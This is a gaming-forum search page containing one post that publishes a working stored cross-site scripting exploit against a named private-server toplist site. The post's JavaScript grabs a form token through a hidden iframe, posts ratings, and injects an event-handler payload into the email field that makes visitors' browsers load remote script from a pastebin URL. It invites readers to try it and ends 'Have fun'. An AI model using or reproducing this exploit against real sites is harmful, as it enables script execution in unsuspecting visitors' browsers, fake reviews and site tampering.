Jump to content

Search the Community

Showing results for tags 'security' in content posted in General.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Community
    • M2Dev
    • Offtopic
    • Games Talk
    • Music / Videos / Art
    • Member Representations
    • Services & Sales
  • Metin2
    • General
    • Questions and Answers
    • Frequently Asked Questions
    • Private Servers
    • Videos
  • Suggest a Tutorial / Release
    • Suggest a Tutorial / Release
    • Temporary forum
  • Releases
    • General
    • Guides & HowTo
    • Tools
    • Programming & Scripts / Systems
    • Maps
    • Quests
    • Binaries & Clients / ServerFiles
    • 3D Models
    • 2D Graphics
    • Operating Systems

Categories

There are no results to display.

There are no results to display.

Product Groups

  • VIP
  • Ads

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Nationality


Skype


Discord


Website


Steam ID


Mapping


3D


2D


C++


LUA


Python


PHP


SQL


HTML


CSS


JavaScript


Empire

Found 1 result

  1. Hi, Here is a small example of a code injection on the top list: metin2pserver.info. If you want to test it yourself: I hosted the following script here ( https://pastebin.com/raw/28VjB803 ): /** * Rate. * * @param {string} serverId * @param {string} name * @param {string} email * @param {number} rating * @option 1 - Insufficient * @option 2 - Inadequate * @option 3 - Sufficient * @option 4 - Satisfying * @option 5 - Good * @option 6 - Very good * @param {string} comment * @param {number} picture * @option 1 - Warrior (m) * @option 2 - Warrior (f) * @option 3 - Ninja (m) * @option 4 - Ninja (f) * @option 5 - Sura (m) * @option 6 - Sura (f) * @option 7 - Shaman (m) * @option 8 - Shaman (f) */ function rate(serverId, name, email, rating, comment, picture = 1) { const root = document.documentElement; const iframe = document.createElement('iframe'); iframe.style.setProperty('display', 'none'); iframe.src = `https://www.metin2pserver.info/rate.php?id=${serverId}`; return new Promise((resolve) => { iframe.onload = () => { const [s] = iframe.contentDocument.getElementsByName('s'); const token = s && s.value; root.removeChild(iframe); const data = { Name: name, Email: email, Rating: rating, Comments: comment, pic: picture, id: serverId, s: token, }; const params = []; for (const param in data) { const value = data[param]; params.push(encodeURIComponent(param) + '=' + encodeURIComponent(value)); } const body = params.join('&'); if (token) { fetch(iframe.src, { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', }, body, }) .then(() => resolve(true)) .catch(() => resolve(false)); } else { resolve(false); } }; root.appendChild(iframe); }); } if (location.hash === '#methowashere') { const serverId = /server-(.*?).html/.exec(location.href)[1]; const name = prompt('Your name'); const comment = prompt('Your comment'); rate(serverId, name, '', 1, comment); } To inject it, go to a server page (e. g.: https://www.metin2pserver.info/server-mt2aom2.html). Launch this script on the page: /** * Rate. * * @param {string} serverId * @param {string} name * @param {string} email * @param {number} rating * @option 1 - Insufficient * @option 2 - Inadequate * @option 3 - Sufficient * @option 4 - Satisfying * @option 5 - Good * @option 6 - Very good * @param {string} comment * @param {number} picture * @option 1 - Warrior (m) * @option 2 - Warrior (f) * @option 3 - Ninja (m) * @option 4 - Ninja (f) * @option 5 - Sura (m) * @option 6 - Sura (f) * @option 7 - Shaman (m) * @option 8 - Shaman (f) */ function rate(serverId, name, email, rating, comment, picture = 1) { const root = document.documentElement; const iframe = document.createElement('iframe'); iframe.style.setProperty('display', 'none'); iframe.src = `https://www.metin2pserver.info/rate.php?id=${serverId}`; return new Promise((resolve) => { iframe.onload = () => { const [s] = iframe.contentDocument.getElementsByName('s'); const token = s && s.value; root.removeChild(iframe); const data = { Name: name, Email: email, Rating: rating, Comments: comment, pic: picture, id: serverId, s: token, }; const params = []; for (const param in data) { const value = data[param]; params.push(encodeURIComponent(param) + '=' + encodeURIComponent(value)); } const body = params.join('&'); if (token) { fetch(iframe.src, { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', }, body, }) .then(() => resolve(true)) .catch(() => resolve(false)); } else { resolve(false); } }; root.appendChild(iframe); }); } /** * Inject. * * @param {string} script * @param {string} name */ function injectScript(script, name = 'Dummy') { const serverId = /server-(.*?).html/.exec(location.href)[1]; const code = `$.getScript('${script}')`; const injection = `"style="animation:fb_transform"onanimationstart="${code}"`; console.log(`Server: ${serverId}`); console.log(`Name: ${name}`); console.log(`Script: ${script}`); console.log(`Injections: ${injection}`); return rate(serverId, name, injection, 1, '[...]'); } You can then inject it like this: injectScript('https://pastebin.com/raw/28VjB803').then((r) => console.log('Result: ', r)); You can then test it like this: https://www.metin2pserver.info/server-UGMT2.html#mailsywashere Have fun
×
×
  • Create New...

Important Information

Terms of Use / Privacy Policy / Guidelines / We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.